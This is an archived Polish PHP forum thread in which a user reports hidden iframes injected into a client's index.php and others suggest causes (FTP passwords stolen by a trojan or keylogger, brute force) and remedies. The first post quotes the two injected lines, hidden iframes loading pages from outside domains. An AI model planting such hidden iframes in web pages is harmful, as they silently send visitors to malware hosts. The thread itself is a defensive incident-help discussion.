Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Exploit czy co?
Forum PHP.pl > Inne > Hydepark
axwell
Znajomy poprosił mnie o pewne przeróbki na stronie jego firmy. Zrobiłem wszystko jak należy, a następnie zakutalizowałem pliki. Oczywiście sprawdzałem czy wszytsko chodzi tak jak powinno. Nie było żadnego problemu. Dziś dzwoni do mnie i mówi że strona nie działa - wywala błąd php w składni w "index.php". Najdziwniejsze jest to, że pliku index.php w ogóle nigdy nie modyfikowałem. Zaglądam do kodu patrze a tu na końcu linijka:

  1. <iframe src="http://nonfatcarbest.cn/ts/in.cgi?mozila16" width=2 height=4 style="visibility: hidden"></iframe>


i jescze w innym miejscu coś takiego:
  1. <?php
  2. echo "<iframe src=\"http://nakulpi.net/?click=C42244\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
  3. ?>


Skąd to mogło się wziąć? I jak zapobiec żeby znowu nie "wlazło" ?
Spawnm
było o tym kilka razy , wywal to i zmień hasło do ftp
axwell
Przeszukałem forum i nie mogę znaleźć. Może jednak ktoś byłby tak miły i podzielił się wiedzą?
Spawnm
przecież powiedziałem , wywalasz frame z indexów i zmieniasz hasło na ftp rolleyes.gif
axwell
To zrobiłem w pierwszej kolejnosći. Ale proszę o odp na pytanie:

Cytat(axwell @ 7.05.2009, 18:45:32 ) *
Skąd to mogło się wziąć?
kwiateusz
z komputera tego osobnika co mial haslo do ftp zwyczajny wirus/keylogger etc skopiowal haslo ftp. polaczyl sie i w index.php pododawal takie cuda
Shadowsword
W niedziele miałem takiego exploita u siebie. Firma hostingowa stwierdziła, że włamali się za pomocą brute-forca (podstawianie znaków). W internecie znalazłem też informacje, że jeżeli masz folder tmp na serwerze i CHMOD 711 to jest na to jakiś exploit (nie wiem, czy to prawda) i trzecia możliwość ściągnąłeś trojana i on pobrał hasła z zapamiętanych w kliencie ftp lub zapisując to co wpisywałeś podczas logowania.
Kocurro
Jak masz gównianie skonfigurowany serwer to nawet exploita nie potrzebujesz a jak masz dobrze skonfigurowany to nawet exploit nie pomoże.
Poker
Pewnie używasz Total Commandera do połączeń z ftp smile.gif

W dodatku po wejściu na taką stronę AVAST ostrzega o tym że znajduję na niej ROBAK.


Miałem identyczny problem usunąłem ze wszystkich plików index.php / .html te IFRAME'y zmieniłem hasło na FTP i teraz działa bez problemu. Oczywiście nie używam juz Total'a
PawelC
Pisałem już co i jak: http://forum.php.pl/index.php?s=&showt...st&p=598818
Czasami wystarczy skorzystać z szukajki...
zwierzołak
Cytat
W niedziele miałem takiego exploita u siebie. Firma hostingowa stwierdziła, że włamali się za pomocą brute-forca (podstawianie znaków).

to mi się wydaje dosyć dziwne, chyba trudno nie zauważyć, że na jakieś konto ftp jest 10000 nieudanych prób zalogowania w krótkim czasie? to chyba źle świadczy o poziomie bezpieczeństwa hostingu jeśli pozwala na taki atak... co innego atakować np zahasłowane archiwum .rar na swoim komputerze

tak mi się wydaje, bo nie znam się na tym zbytnio - jestem ciekawy co sądzą specjaliści od bezpieczeństwa smile.gif
Shadowsword
Też nie sądze, że to był brute force, ale tak mi napisali w wiadomości. Chociaż jeżeli np. mają dobrego botneta i jakoś rozłożyli atak np. na pół roku to możliwe. 
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.